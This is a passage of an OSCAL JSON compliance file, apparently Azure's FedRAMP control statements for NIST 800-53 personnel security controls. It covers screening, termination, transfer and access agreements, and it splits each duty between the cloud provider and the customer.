The Microsoft Cloud Screen includes the following:\n\n* Employment history check for the previous seven years\n* Education Check (highest degree obtained)\n* Social Security Number (SSN) Check\n* Criminal History Check for the previous seven years\n* Office of Foreign Assets Control List (OFAC) Check\n* Bureau of Industry and Security List (BIS) Check\n* Office of Defense Trade Controls Debarred Persons List Check\n\nVendor staff with access to customer data are required to sign a background screening addendum with Microsoft. Microsoft managers are required to include screening verbiage in their respective SOWs with vendors."}],"responsibilities":[{"uuid":"9f801ca0-afc0-4cbd-bfdf-0241dedfbcca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-009"}],"description":"The customer is responsible for screening individuals prior to authorizing access to customer-deployed resources.","provided-uuid":"5fc6d483-125e-40cf-bdac-4e845fd2e637"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c9dc2f68-fb71-40df-91e0-b45fb92ed0e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-010"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-3_smt.b","by-components":[{"uuid":"6ade4a84-c6fd-47ad-9dce-325315651090","export":{"provided":[{"uuid":"4e0ae601-5b42-46d2-8c3e-e255d1e187da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-010"}],"description":"This control is not applicable. 
Background investigation requirements for Azure for FedRAMP are only at the Minimum Background Investigation level, and there are no reinvestigation requirements for moderate and low public trust positions."}],"responsibilities":[{"uuid":"f714babe-35b4-46cd-b586-68eaa341058c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-010"}],"description":"The customer is responsible for rescreening individuals at a customer-defined frequency or under customer-defined conditions.","provided-uuid":"4e0ae601-5b42-46d2-8c3e-e255d1e187da"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"232bb7b2-ac7e-444a-b8c2-3f9818fc462f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-3.3","statements":[{"uuid":"8a8d26cd-7a52-4a82-9d75-08b6e91e2c59","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-011"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-3.3_smt.a","by-components":[{"uuid":"a480c7fb-267f-4243-97b5-bb662f087755","export":{"provided":[{"uuid":"1cb1c295-4e71-400c-a276-fdf4a4970526","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-011"}],"description":"Azure personnel are required to satisfy the screening requirements."}],
"responsibilities":[{"uuid":"58d244cc-4bbc-435d-bbf6-e6c1fde2a7a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-011"}],"description":"The customer is responsible for controlling access to protected information by ensuring that individuals accessing customer-deployed resources which process, store, or transmit information requiring special protection have been assigned official government duties that demonstrate valid access authorizations.","provided-uuid":"1cb1c295-4e71-400c-a276-fdf4a4970526"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6c0d1faf-5ead-4c89-8f95-8000f108a6c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-012"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-3.3_smt.b","by-components":[{"uuid":"b640f8b0-8717-4f8b-84cd-7e6e46550e92","export":{"provided":[{"uuid":"cd8c5c44-6832-4b6e-829c-981d299f0044","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-012"}],"description":"Azure personnel are required to satisfy the screening requirements."}],"responsibilities":[{"uuid":"60dbde22-62cf-4881-b501-c4394341ab45","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-012"}],"description":"The customer is responsible for controlling access to protected information by ensuring that individuals accessing customer-deployed resources which process, store, or transmit information requiring special protection, satisfy any additional customer-defined personnel screening 
criteria.","provided-uuid":"cd8c5c44-6832-4b6e-829c-981d299f0044"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1c67563f-ecd3-4b17-ba9b-42206176a970","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-4","statements":[{"uuid":"28133975-0398-427a-8407-f8bf79a22249","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-013"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-4_smt.a","by-components":[{"uuid":"10cd3eb2-54dc-4973-bc89-c94ed36de06e","export":{"provided":[{"uuid":"01888535-7cc1-494b-9d61-beb26da1e92d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-013"}],"description":"Microsoft HR and Azure management ensure personnel termination is handled appropriately. For voluntary terminations, on the last day of employment, the individual is terminated from the HR system via a Termination Transaction ticket entered in the Employee/Manager Self Service Tool by the employee, manager, group administrator, or equivalent personnel with work-on-behalf privileges. For involuntary terminations, the request is submitted by the aligned HR Employee Relations Manager to the Central HR Operations team for processing.\n\nOnce entered, voluntary termination requests are approved by the individual's manager, group administrator, or equivalent personnel with work-on-behalf privileges. 
Once the transaction has been entered and approved, Microsoft Accounts and Security teams are notified and access to information systems is disabled. Human Resources is also notified of the termination request. For voluntary terminations, access is disabled on the last day of employment, barring any special considerations such as security concerns or if the employee is leaving for a competitor. For involuntary terminations, an urgent request for access termination is submitted via email from HR and access is disabled within four (4) hours.\n\nTerminations are communicated to personnel required to remove information system and physical access to facilities via the Manager Self-Service termination transaction process and/or urgent terminations email template. The supervisor and/or Business Administrators are responsible for ensuring that all local access to Azure physical components is removed."}],"responsibilities":[{"uuid":"f2584a5c-ef93-4b77-bd69-c3d6c3189ed5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-013"}],"description":"The customer is responsible for appropriately terminating customer personnel within a customer-defined time period.","provided-uuid":"01888535-7cc1-494b-9d61-beb26da1e92d"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d2fde38b-31db-4fc5-80c1-9bcd3944d789","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-014"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-4_smt.b","by-components":[{"uuid":"83ccf628-943d-4466-8375-2c74483bef8c","export":{"provided":[{"uuid":"6429a4c0-381a-44a9-bf8b-fa0d7177a0e6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-014"}],"description":"When an individual is terminated via voluntary termination, he or she is removed from the Human Resources Information System (HRIS) via a Termination Transaction approved by the individual's manager, group administrator, or equivalent personnel with work-on-behalf privileges. If an individual is involuntarily terminated, the request is submitted by the central HR Operations team via a request from the org-aligned HR Manager. 
When an individual is marked as terminated in HRIS, this information propagates to Active Directory, which then automatically removes/revokes any authenticators/credentials associated with the individual."}],"responsibilities":[{"uuid":"feb1c5b4-d014-49d4-b1f4-012e1a34fa34","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-014"}],"description":"The customer is responsible for the appropriate revocation of authenticators/credentials associated with terminated customer personnel.","provided-uuid":"6429a4c0-381a-44a9-bf8b-fa0d7177a0e6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3e4de456-f6bb-466b-8b52-af9151a40cd5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-015"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-4_smt.c","by-components":[{"uuid":"d4f54d6f-b25d-4ef3-889b-c8c28b42197b","export":{"provided":[{"uuid":"b5fc0f6e-121b-4844-a08f-31b12f3e6046","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-015"}],"description":"Microsoft sends an exit survey to personnel being hired by a competitor on or before the user's last day at Microsoft. Topics covered in the exit survey include review of non-disclosure provisions. 
An exit survey may not be conducted in the event of a termination where the individual is not going to a competitor."}],"responsibilities":[{"uuid":"e580ceb0-6cc9-497c-be45-62b00429ab8a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-015"}],"description":"The customer is responsible for conducting exit interviews which include customer-defined information security topics upon termination of customer personnel.","provided-uuid":"b5fc0f6e-121b-4844-a08f-31b12f3e6046"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"60da7335-ed01-4869-b022-9b67955f025d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-016"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-4_smt.d","by-components":[{"uuid":"d3d87d2a-0d94-4579-8540-88e5741b4a9c","export":{"provided":[{"uuid":"8a0a11c2-dfa6-4827-a133-43ae2004e213","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-016"}],"description":"Upon termination, building access badges, logical access badges, computer/hardware, and vehicle authorization tags are collected. Access to the work location, office, or station is denied or supervised to allow the individual to gather personal belongings prior to being escorted out of the building. 
These processes ensure that Microsoft collects all security-related, organizational information system-related property prior to the terminated individual's departure."}],"responsibilities":[{"uuid":"c19ad1b7-3338-41ba-a4e4-e1c999deba7e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-016"}],"description":"The customer is responsible for retrieving all security- and system-related property upon termination of customer personnel.","provided-uuid":"8a0a11c2-dfa6-4827-a133-43ae2004e213"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"024407b1-09f1-4207-8c7b-da37ef7fb78f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-017"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-4_smt.e","by-components":[{"uuid":"0f34bce0-ff97-459f-b3d9-27f4e0d03dbe","export":{"provided":[{"uuid":"45224965-0461-41c7-b18c-cf39237e4426","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-017"}],"description":"Microsoft retains information formerly controlled by a terminated individual on file servers and SQL/SharePoint as part of the Data Protection Services' (DPS) disaster recovery retention for ninety (90) days. 
Additionally, managers can gain access to workstations{{RX accounts}} of terminated personnel after HR has approved the requested access."}],"responsibilities":[{"uuid":"b087cb7b-b5ff-4589-8f00-b81013c8f5f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-017"}],"description":"The customer is responsible for retaining access to resources formerly controlled by terminated customer personnel.","provided-uuid":"45224965-0461-41c7-b18c-cf39237e4426"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4485a5e8-4174-4887-ad62-a6faaa8dd61f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-4.2","statements":[{"uuid":"41f2793c-0b82-4309-9479-439dd694f64d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-018"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-4.2_smt","by-components":[{"uuid":"b8da16c9-ff6f-43e8-bf59-7e7b0bb34c5a","export":{"provided":[{"uuid":"3494a490-2e55-4fff-a7c3-607285bee34e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-018"}],"description":"Microsoft Human Resources (HR) and the individual's manager ensure personnel termination is handled appropriately. 
The individual is terminated from the HR system via a Termination Transaction ticket entered in the Manager Self Service Tool and approved by the individual's manager, group administrator, or equivalent personnel with work-on-behalf privileges. Once the transaction has been entered and approved, Microsoft Accounts and Security teams are notified and access to information systems and physical locations is disabled."}],"responsibilities":[{"uuid":"0e1dfe62-987d-48eb-b713-af2104dad4f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-018"}],"description":"The customer is responsible for employing automated mechanisms to notify customer-defined personnel/roles upon termination of a customer employee.","provided-uuid":"3494a490-2e55-4fff-a7c3-607285bee34e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bb3e73b0-3890-4626-8158-aab75b2d2e92","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-5","statements":[{"uuid":"3594c57f-74ff-4fcc-ba81-980d89b38564","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-019"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-5_smt.a","by-components":[{"uuid":"84e48a82-68c0-4393-9b08-596584a7b85c","export":{"provided":[{"uuid":"b7462574-c42b-4522-8c8d-88a77302df6a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-019"}],"description":"Microsoft HR 
ensures personnel transfer is handled appropriately. Microsoft implements personnel transfer using the Manager Self Service Tool, which is managed by Microsoft Headcount Operations. When personnel transfer to new positions with new reporting structures, a Manager Self Service Tool transfer transaction is keyed into the HR system by the individual's manager, group administrator, or equivalent personnel with work-on-behalf privileges. Once the transfer has populated in the downstream tools and applications, access to data is reassigned based on the new role and scope within twenty-four (24) hours of transfer.\n\nAccess to buildings, rooms, and websites can be requested by the transferred individual's manager."}],"responsibilities":[{"uuid":"16adc4a0-9ae0-466e-8fdb-d89b870688e5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-019"}],"description":"The customer is responsible for appropriately transferring personnel and reviewing current logical and physical access authorizations to customer-deployed resources/facilities when individuals are reassigned or transferred.","provided-uuid":"b7462574-c42b-4522-8c8d-88a77302df6a"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"30bc5c4f-3ee2-4ff9-b38e-ccaf1dee98cb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-020"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-5_smt.b","by-components":[{"uuid":"4a746b90-614a-4ea7-be1b-3cc09d046104","export":{"provided":[{"uuid":"761891c9-8b98-4789-bf30-a2fdd4331781","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-020"}],"description":"Azure ensures account management activities associated with personnel transfer is initiated within twenty-four (24) hours of submission for personnel who are reassigned or transferred to other positions within the organization._x000D_ _x000D_"}],"responsibilities":[{"uuid":"b5b720c9-4db4-4739-85b4-f598925eec05","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-020"}],"description":"The customer is responsible for performing customer-defined actions that must be taken within a defined time period following formal transfer/reassignment of customer personnel.","provided-uuid":"761891c9-8b98-4789-bf30-a2fdd4331781"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"aca3d4e2-947f-4c81-8de6-c133ace7cde3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-021"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-5_smt.c","by-components":[{"uuid":"967f4603-f5d7-400a-adf0-af0bb2596a68","export":{"provided":[{"uuid":"ee7bee27-6c63-4b19-a337-85e5d7da165d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-021"}],"description":"Microsoft HR ensures personnel transfer is handled appropriately. Microsoft implements personnel transfer using the Manager Self Service Tool, which is managed by Microsoft Headcount Operations. When personnel transfer to new positions with new reporting structures, the Manager Self Service Tool transfer transaction is keyed into the HR system by the individual's manager, group administrator, or equivalent personnel with work-on-behalf privileges. 
Once the transfer has populated in the downstream tools and applications, access to data is reassigned based on the new role and scope within twenty-four (24) hours of transfer.\n\nAccess to buildings/rooms/websites can be requested by the transferred individual's manager."}],"responsibilities":[{"uuid":"9703da34-ed34-4978-8255-59c9877e8981","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-021"}],"description":"The customer is responsible for modifying access authorizations of transferred/reassigned customer personnel as a result of the review performed in PS-05.a.","provided-uuid":"ee7bee27-6c63-4b19-a337-85e5d7da165d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ce576153-be47-406f-a559-2211bfdbef4a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-022"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-5_smt.d","by-components":[{"uuid":"064deecc-a238-400b-914b-2c2b907ea404","export":{"provided":[{"uuid":"b82fa148-6b97-4d9e-b3d6-cf05cb0e40b0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-022"}],"description":"Microsoft Managers of employees are responsible for ensuring personnel transfer is initiated within twenty-four (24) hours for personnel who are reassigned or transferred to other positions within the organization in the Employee Central system. Subsequently, the new managers of employees are responsible for approving the initiated request in the Employee Central system. Microsoft defines the transfer or reassignment actions to implement using the Employee Central system, which is managed by Microsoft Human Resources. When an individual transfers to a position within a different cost center, an Employee Central transfer transaction is keyed into the system by HR Operations."}],"responsibilities":[{"uuid":"bf3d1b32-0ed8-45af-ab9e-ba87feab3891","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-022"}],"description":"The customer is responsible for notifying customer-defined personnel/roles within a customer-defined time period following customer personnel transfer/reassignment.","provided-uuid":"b82fa148-6b97-4d9e-b3d6-cf05cb0e40b0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1ee8febe-898e-4821-99db-1ff5bf5914ec","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-6","statements":[{"uuid":"8db79a56-51da-4c56-922b-4d5b82de4994","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-6_smt.a","by-components":[{"uuid":"110e1293-f6b2-4e79-b978-720de90cdac7","export":{"provided":[{"uuid":"08d4544c-2824-4b44-8cf6-b424583cc3b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-023"}],"description":"Microsoft has developed and documented confidentiality and non-disclosure provisions for personnel requiring access to Azure in various roles.\n\nBefore gaining access to information systems, Microsoft full-time employees (FTEs) must sign the Employee Agreement (EA), which includes non-disclosure provisions and statements regarding information and asset protection responsibilities. This document also describes the penalties for the violation of these responsibilities. The annual fulfillment of the Security Foundations training course is signed by the employee and meets the requirements for the rules of behavior and access agreements. At the end of the Security Foundations course, the employee must check a box acknowledging that the employee has access to the Microsoft Policy and that the employee will abide by those policies.\n\nThird parties, such as subcontractors and vendors, must complete the Resource Access Agreements (RAA), the Email/Network & Cardkey Access Agreement (ECA), and the Contract Worker Agreement (CWA) that also includes non-disclosure provisions for Agency Temporary Workers (ATW). These documents are a part of the Master Supplier Services Agreement (MSSA).\n\nIn addition, all Microsoft employees are required to sign paperwork acknowledging security training provided during the new hire orientation process. During this training, descriptions are given as to the responsibilities and expected behavior regarding information and information system usage. It is also communicated that security responsibilities extend outside of the work site and beyond the standard operating hours of their employment and continue for a defined period after employment ends. It is the duty of Microsoft personnel to be in compliance with regulatory mandates."}],"responsibilities":[{"uuid":"8090c7bc-6044-474f-ae5f-3a10a203e0ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-023"}],"description":"The customer is responsible for developing and documenting access agreements for customer-deployed resources.","provided-uuid":"08d4544c-2824-4b44-8cf6-b424583cc3b2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3da99346-4509-49aa-98c6-b3c2394f6b09","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-6_smt.b","by-components":[{"uuid":"4e628acb-f642-48ba-b320-94aeaf7b12cb","export":{"provided":[{"uuid":"bb53b3e2-bd5d-449c-90f0-75a473b8d1f0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-024"}],"description":"The Employee Agreement, RAA, ECA, and CWA, as well as other contractual documents signed as part of the new hire orientation process, are reviewed annually to reflect changes in the Microsoft environment, and updated as needed."}],"responsibilities":[{"uuid":"f9300da8-2de9-41bb-958f-405af540eaa8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-024"}],"description":"The customer is responsible for reviewing and updating access agreements at a customer-defined frequency.","provided-uuid":"bb53b3e2-bd5d-449c-90f0-75a473b8d1f0"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"59ae3c8b-cac1-4d55-a385-00898421d682","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-026"}],"statement-id":"ps-6_smt.c","by-components":[{"uuid":"2c888e7f-2a2d-4a44-86fd-c855cd906973","export":{"provided":[{"uuid":"3e2481e5-e2e6-4881-ac96-cf57aa97e681","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-025"}],"description":"Prior to granting access to organizational information and services, all Microsoft full-time employees (FTEs) must sign the Employee Agreement as a condition of employment. Third parties, such as subcontractors and vendors, must complete the Resource Access Agreements, which include non-disclosure provisions and statements regarding information and asset protection responsibilities."},{"uuid":"5f531719-7135-4723-8900-692a238bdc44","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-026"}],"description":"Employees re-sign the EA if they move to some geographic locations. Submission of annual training completion constitutes agreement that the user understands and agrees to the EA. Third parties, such as subcontractors and vendors, must complete the Resource Access Agreements, which include non-disclosure provisions and statements regarding information and asset protection responsibilities. Third parties are also required to take Supplier Code of Conduct training (SCOC). Because of the nature of JIT access, a user's level of access can change multiple times per day. As such, Azure does not require re-signing of the EA or retraining any time there is a change to the user's level of access."}],"responsibilities":[{"uuid":"50a1b7b4-e959-4bdb-b265-049ce27b3c2b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-025"}],"description":"The customer is responsible for verifying that individuals requiring access to customer-deployed resources review and sign access agreements prior to being granted access.","provided-uuid":"3e2481e5-e2e6-4881-ac96-cf57aa97e681"},{"uuid":"1a722f7b-873a-4686-ab05-8db07f015d21","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-026"}],"description":"The customer is responsible for verifying that individuals requiring access to customer-deployed resources re-sign when the agreements have been updated and/or at a customer-defined frequency.","provided-uuid":"5f531719-7135-4723-8900-692a238bdc44"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"dd01e9db-1577-4949-8c17-a75b37fd3be7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-7","statements":[{"uuid":"addf8a7c-14cf-42c4-9876-21057739a0ae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-027"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-7_smt.a","by-components":[{"uuid":"5dbfc902-c2c4-4557-aeb7-e4283a66b6ad","export":{"provided":[{"uuid":"8b59eff0-e8ac-447e-b54a-b426c490fe29","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-027"}],"description":"Personnel security requirements, including security roles and responsibilities for 